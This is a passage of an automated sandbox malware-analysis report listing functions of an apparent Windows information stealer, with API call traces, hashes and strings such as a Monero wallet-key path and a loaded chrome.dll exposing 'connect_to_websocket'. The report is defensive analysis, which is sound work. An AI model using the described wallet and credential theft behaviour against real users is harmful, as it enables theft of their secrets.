                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 49c4491e9146f83c3fd7d04dfd56a115c9bb5197c2d7e21f51a3ed8d9e1ae5ae
                                      • Instruction ID: a8a5732966b7d5d4bf207e5423cb039185c1e14d7f17596013bc54c11521dbf2
                                      • Opcode Fuzzy Hash: 49c4491e9146f83c3fd7d04dfd56a115c9bb5197c2d7e21f51a3ed8d9e1ae5ae
                                      • Instruction Fuzzy Hash: 8B114CB5E44305ABD700DB94ED46FAFBBB8FB84B10F104119F619EB280DB7969048BA1
                                      Function 00A493F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • StrStrA.SHLWAPI(0131EBE0,00000000,00000000,?,00A39F71,00000000,0131EBE0,00000000), ref: 00A493FC
                                      • lstrcpyn.KERNEL32(00D07580,0131EBE0,0131EBE0,?,00A39F71,00000000,0131EBE0), ref: 00A49420
                                      • lstrlen.KERNEL32(00000000,?,00A39F71,00000000,0131EBE0), ref: 00A49437
                                      • wsprintfA.USER32 ref: 00A49457
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: f8d639e11538dbfeb68716c9c7a32cccb3173e32b3cba3984c3ebee29e5577ec
                                      • Instruction ID: 5d0cff3b95f94c80e25f311947115513c2b384813c309de2bd6c7ad1555591dd
                                      • Opcode Fuzzy Hash: f8d639e11538dbfeb68716c9c7a32cccb3173e32b3cba3984c3ebee29e5577ec
                                      • Instruction Fuzzy Hash: 0401A575904208FFCB04DFA8CD48EEE7BB8EB48304F108648F90D9B385D631AA54DBA0
                                      Function 00A312A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A312B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A312BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A312D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A312F5
                                      • RegCloseKey.ADVAPI32(?), ref: 00A312FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: d59e5afb2d66a00772f01128aab7494e1a046186f471caf7ec23e764a04f4726
                                      • Instruction ID: cd47f191f1496178cfaa1d8c5e6d23b56f9e980193b059d23a2e3728f04fdf8a
                                      • Opcode Fuzzy Hash: d59e5afb2d66a00772f01128aab7494e1a046186f471caf7ec23e764a04f4726
                                      • Instruction Fuzzy Hash: EF01CD79E44309BBDB04DFE4DC49FAE7778AB48701F104199FA09DB280D670AA008BA4
                                      Function 00A4CB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String___crt$Type
                                      • String ID:
                                      • API String ID: 2109742289-3916222277
                                      • Opcode ID: 08c7be4d95b742f8bc4fd1b242f7d9d6f7a910ad30feb79c23e7c88fd13117fe
                                      • Instruction ID: 204844e189f6857a2a967e25424e296b44eb14de1e55ec1430b7f550f643d087
                                      • Opcode Fuzzy Hash: 08c7be4d95b742f8bc4fd1b242f7d9d6f7a910ad30feb79c23e7c88fd13117fe
                                      • Instruction Fuzzy Hash: F941F8B410079C9EDB318B248DC5FFB7BF8AB85718F1444E8E98E97182D2719A45DF60
                                      Function 00A468D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00A46903
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00A469C6
                                      • ExitProcess.KERNEL32 ref: 00A469F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: aa3d735ee3229cda854251ddfa035fc0507d8028f4c8dbcb4cdbaa8e3d6d0972
                                      • Instruction ID: 156230eb2e858bc3989583fa0129257a9aae71cfe165f6cbfeb68b259685ba33
                                      • Opcode Fuzzy Hash: aa3d735ee3229cda854251ddfa035fc0507d8028f4c8dbcb4cdbaa8e3d6d0972
                                      • Instruction Fuzzy Hash: 1F314FB5D01218ABDB14EB90DD95FDEB778EF54300F404188F209A6191DF746B49CF69
                                      Function 00A48950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A50E10,00000000,?), ref: 00A489BF
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A489C6
                                      • wsprintfA.USER32 ref: 00A489E0
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 1695172769-2206825331
                                      • Opcode ID: a2592884f8ec07768532991c98ae923a318c76c32f71ea3d75375e0eba8f6ffd
                                      • Instruction ID: 8daeafeb11db89fe19edc7f818894f88a084ac4d04f7d681e339fae2746afe36
                                      • Opcode Fuzzy Hash: a2592884f8ec07768532991c98ae923a318c76c32f71ea3d75375e0eba8f6ffd
                                      • Instruction Fuzzy Hash: 7621E5B1E44304AFDB00DFA4DD45FAEBBB8FB48711F104519FA19AB280C775A9008BB5
                                      Function 00A3A090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00A3A098
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                      • API String ID: 1029625771-1545816527
                                      • Opcode ID: a51951d8b5cf16575cda12a506f9f3bc131f31e4adde8d397553db0d11bc7c38
                                      • Instruction ID: d87a7f7a9e00d9ccab6dff474742bad691f950f8e2e2de0eb9644d3c8fc67f30
                                      • Opcode Fuzzy Hash: a51951d8b5cf16575cda12a506f9f3bc131f31e4adde8d397553db0d11bc7c38
                                      • Instruction Fuzzy Hash: 68F0E270E89314BEDA00EB60EC44BA63274B316305F104A29F409DF3A0D6B5A888CA66
                                      Function 00A48EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00A496AE,00000000), ref: 00A48EEB
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A48EF2
                                      • wsprintfW.USER32 ref: 00A48F08
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 769748085-2783943728
                                      • Opcode ID: 61f32c6169ed0533be7d33baa1e35c6be4251076f373176e3b2d35275f47bb66
                                      • Instruction ID: f21802da160e2244e5f64cb2ff74f380132ac2ea6af2834e02e4e44519936371
                                      • Opcode Fuzzy Hash: 61f32c6169ed0533be7d33baa1e35c6be4251076f373176e3b2d35275f47bb66
                                      • Instruction Fuzzy Hash: 4DE0B675E48309BBDB10DBA4DD0AE6977A8EB05702F000194FD0DDA380DA71AE109BA5
                                      Function 00A3A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A48CF0: GetSystemTime.KERNEL32(00A50E1B,0131E198,00A505B6,?,?,00A313F9,?,0000001A,00A50E1B,00000000,?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A48D16
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A3AA11
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 00A3AB2F
                                      • lstrlen.KERNEL32(00000000), ref: 00A3ADEC
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                      • DeleteFileA.KERNEL32(00000000), ref: 00A3AE73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 66a32a7e79fd2015706ff608f24aaf482f980c01017e611c75900611b2677439
                                      • Instruction ID: 76592720561aea1d865fd4bda757224b4b7dde5f7843da7ed9dcf4104979e7fd
                                      • Opcode Fuzzy Hash: 66a32a7e79fd2015706ff608f24aaf482f980c01017e611c75900611b2677439
                                      • Instruction Fuzzy Hash: FFE11E76D505189BDB04EBA4DEA2EEE7339AFA4301F408598F11676191EF306E0DCB72
                                      Function 00A3D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A48CF0: GetSystemTime.KERNEL32(00A50E1B,0131E198,00A505B6,?,?,00A313F9,?,0000001A,00A50E1B,00000000,?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A48D16
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A3D581
                                      • lstrlen.KERNEL32(00000000), ref: 00A3D798
                                      • lstrlen.KERNEL32(00000000), ref: 00A3D7AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 00A3D82B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
